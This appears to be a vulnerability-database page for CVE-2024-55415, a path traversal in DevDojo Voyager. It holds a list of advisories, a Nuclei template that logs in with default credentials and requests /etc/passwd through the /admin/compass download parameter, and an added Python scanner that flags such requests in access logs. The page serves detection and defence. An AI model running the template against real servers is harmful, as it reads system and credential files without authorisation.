| Title | Published | Views | Reporter |
|---|---|---|---|
| A vulnerability in Voyager for the Laravel PHP framework, related to improper handling of relative pathnames to directories, allows attackers to compromise the confidentiality, integrity, and availability of protected information. | 31 Jan 2025 00:00 | – | bdu_fstec |
| CVE-2024-55415 | 29 Jan 2025 19:36 | – | circl |
| Voyager security vulnerability | 30 Jan 2025 00:00 | – | cnnvd |
| CVE-2024-55415 | 30 Jan 2025 00:00 | – | cve |
| CVE-2024-55415 | 30 Jan 2025 00:00 | – | cvelist |
| DevDojo Voyager vulnerable to path traversal | 30 Jan 2025 15:31 | – | github |
| CVE-2024-55415 | 30 Jan 2025 15:15 | – | nvd |
| GHSA-J63M-2VR6-FV7M DevDojo Voyager vulnerable to path traversal | 30 Jan 2025 15:31 | – | osv |
| PT-2025-1308 | 30 Jan 2025 00:00 | – | ptsecurity |
| CVE-2024-55415 | 23 May 2025 07:41 | – | redhatcve |
```yaml
id: CVE-2024-55415

info:
  name: DevDojo Voyager <=1.8.0 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
  impact: |
    Authenticated attackers can exploit path traversal to read arbitrary files from the server, potentially exposing sensitive configuration files, credentials, and application source code.
  remediation: |
    Update DevDojo Voyager to version 1.8.1 or later to address the path traversal vulnerability.
  reference:
    - https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
    - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213
    - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44
    - https://nvd.nist.gov/vuln/detail/CVE-2024-55415
  classification:
    cve-id: CVE-2024-55415
    epss-score: 0.14586
    epss-percentile: 0.96231
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"Voyager"
  tags: cve,cve2024,devdojo,voyager,lfr,lfi,vuln

variables:
  username: "[email protected]"
  password: "password"

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: csrf
        group: 1
        regex:
          - 'name="_token" value="([a-zA-Z0-9]+)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{csrf}}&email={{username}}&password={{password}}&

    matchers:
      - type: dsl
        dsl:
          - "contains(body,'/admin</title>')"
          - "status_code == 302"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - status_code == 200
        condition: and
# digest: 4b0a004830460221009c853d633bac8185b7266cffc1cc27cbcfaa517cb44e601e7273c3c642a91e6c022100eddfb2138367c54eeb28ffdde14205f3e7d92f19e087eed45d21bf8453c182f9:922c64590222798bb761d5b6d8e72950
```
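A defender-side complement to the template above, added here as an example that is not part of the Vulners page, the Nuclei project or Voyager itself: it scans web-server access-log lines for the `/admin/compass?download=` pattern the template exercises, base64-decodes the parameter, and flags values that are absolute or escape an allowed directory. The `SAMPLE_LOG` lines, the common-log-format layout and the `storage/logs` allowed root (`ALLOWED_ROOT`) are constructed assumptions, not values from the page.

```python
import base64
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the original page): a legitimate
# log download, a traversal attempt, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jan/2025:15:31:02 +0000] "GET /admin/compass?download=c3RvcmFnZS9sb2dzL2xhcmF2ZWwubG9n HTTP/1.1" 200 5120
10.0.0.9 - - [30/Jan/2025:15:32:10 +0000] "GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 1834
10.0.0.7 - - [30/Jan/2025:15:33:44 +0000] "POST /admin/login HTTP/1.1" 302 0
"""
ALLOWED_ROOT = "storage/logs"  # assumption: where legitimate compass downloads live
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_download_param(target):
    """Base64-decode the `download` value of a /admin/compass request, else None."""
    parts = urlsplit(target)
    if parts.path != "/admin/compass":
        return None
    values = parse_qs(parts.query).get("download")
    if not values:
        return None
    try:
        raw = base64.b64decode(values[0], validate=True)
    except ValueError:  # not valid base64, so not the pattern the template uses
        return None
    return raw.decode("utf-8", errors="replace")

def is_traversal(path, allowed_root=ALLOWED_ROOT):
    """True if the decoded path is absolute, climbs upward, or leaves the allowed root."""
    if "\\" in path or "\x00" in path:
        return True
    normalised = posixpath.normpath(path)
    if normalised.startswith("/") or normalised == ".." or normalised.startswith("../"):
        return True
    return not (normalised == allowed_root or normalised.startswith(allowed_root + "/"))

def find_suspicious(log_text):
    """Return (client_ip, decoded_path, status) for each traversal-looking download."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        decoded = decode_download_param(match.group("target"))
        if decoded is not None and is_traversal(decoded):
            hits.append((line.split(" ", 1)[0], decoded, int(match.group("status"))))
    return hits
```

A status of 200 on a flagged line means the server served the file, so such hits warrant checking the Voyager version against the 1.8.1 remediation above.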